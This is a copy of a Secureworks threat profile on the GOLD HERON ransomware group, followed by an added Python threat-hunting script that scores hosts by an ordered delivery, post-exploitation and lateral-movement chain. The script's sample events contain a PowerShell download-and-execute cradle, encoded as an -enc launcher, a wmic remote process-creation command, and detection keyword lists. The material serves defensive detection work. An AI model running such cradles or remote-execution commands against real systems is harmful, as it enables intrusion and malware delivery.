www.secureworks.com (23.100.35.118)
URL: https://www.secureworks.com/research/threat-profiles/gold-heron
Submission: On December 21 via api from US — Scanned from DE
GOLD HERON
Secureworks Threat Profiles. © 2021 Secureworks, Inc.

Thematic area: Cybercrime
Objectives: Financial Gain, Ransomware
Aliases: none listed
Tools: Cobalt Strike, DoppelPaymer, Dridex, PowerShell Empire

GOLD HERON is a group of financially motivated cybercriminals responsible for distributing the DoppelPaymer and Grief ransomware families. CTU researchers assess with moderate confidence that GOLD HERON consists of former operators from the GOLD DRAKE threat group. At the time of the split, GOLD DRAKE operated both the BitPaymer ransomware and the Dridex botnet, and GOLD HERON is thought to possess the source code for both malware families. GOLD HERON adopted the name DoppelPaymer for its ransomware after security researchers had used that moniker to refer to it publicly.

Intrusions rely largely on a modified Dridex build, colloquially referred to as Dridex 2.0, for both initial access and lateral movement. GOLD HERON delivers Dridex onto victims' networks through spam email, sometimes sent via the Cutwail v2 botnet. PowerShell Empire or Cobalt Strike is frequently deployed into the environment to augment Dridex's capabilities.
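The profile describes a chain of spam-delivered Dridex, an in-memory post-exploitation framework (PowerShell Empire or Cobalt Strike) and Dridex-driven lateral movement. The script below is an added hunting example, not Secureworks detection content and not derived from this profile's indicators: it classifies process-creation events into those three stages and raises a host to high severity only when all three appear in order. The specific tells it keys on are assumptions drawn from the tools' commonly documented behaviour rather than from the page: a mail client or Office process handing off to a script host (a typical maldoc delivery path), an encoded PowerShell command that decodes to a download cradle (the shape of Empire-style launchers), and `wmic /node:` or PsExec from the compromised host. The events are constructed.

```python
"""Stage-based hunt over process-creation telemetry (Sysmon event 1 / EDR equivalent).

Added example. Indicator choices are assumptions based on commonly documented
tradecraft of the named tools, not indicators published in the GOLD HERON profile.
"""
import base64
import re
from dataclasses import dataclass

# Assumed delivery path: attachment/macro in a mail or Office process spawns a script host.
OFFICE_OR_MAIL = {"outlook.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe",
                "regsvr32.exe", "powershell.exe"}
# Assumed lateral-movement tooling driven from the foothold.
LATERAL_TOOLS = {"wmic.exe", "psexec.exe", "psexec64.exe"}
# PowerShell encoded-command switch and its Base64 argument (UTF-16LE once decoded).
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-cradle fragments typical of Empire-style launchers (assumption).
STAGER_MARKERS = ("downloadstring", "webclient", "iex", "invoke-expression")
ORDER = ("delivery", "post_exploitation", "lateral_movement")


@dataclass
class ProcEvent:
    host: str
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent):
    """Map one event to a chain stage, or None if it matches nothing."""
    parent, image = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_OR_MAIL and image in SCRIPT_HOSTS:
        return "delivery"
    if image == "powershell.exe":
        decoded = decode_encoded_command(ev.cmdline)
        if decoded and any(k in decoded.lower() for k in STAGER_MARKERS):
            return "post_exploitation"
    if image in LATERAL_TOOLS and ("/node:" in ev.cmdline.lower() or image.startswith("psexec")):
        return "lateral_movement"
    return None


def severity_for(seen):
    """High only when every stage occurred and in chain order; medium for two stages."""
    first = [next((i for i, s in enumerate(seen) if s == stage), None) for stage in ORDER]
    if all(i is not None for i in first) and first == sorted(first):
        return "high"
    return "medium" if len(set(seen)) >= 2 else "low"


def hunt(events):
    """Group stage hits per host (events assumed in time order) and score each host."""
    per_host = {}
    for ev in events:
        stage = classify(ev)
        if stage:
            per_host.setdefault(ev.host, []).append(stage)
    return [{"host": h, "stages": s, "severity": severity_for(s)} for h, s in per_host.items()]


# Constructed sample: one full chain on WS01, one benign encoded-free PowerShell on WS02.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("WS01", 4100, 3020, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
              r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\a\AppData\Local\Temp\invoice.js"'),
    ProcEvent("WS01", 4188, 4100, r"C:\Windows\System32\wscript.exe", PS,
              f"powershell -noP -sta -w 1 -enc {ENC}"),
    ProcEvent("WS01", 4210, 4188, PS, r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic /node:FS01 process call create "rundll32 C:\Windows\Temp\x.dll,Run"'),
    ProcEvent("WS02", 800, 600, r"C:\Windows\explorer.exe", PS,
              r"powershell -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Expect noise from each rule on its own: administrators do run encoded commands and `wmic /node:` from management hosts, which is why the score rests on the ordered chain rather than any single hit. Nothing here fingerprints the modified Dridex build itself, since the profile gives no host or network artefacts for it; the rules cover the generic tradecraft around it.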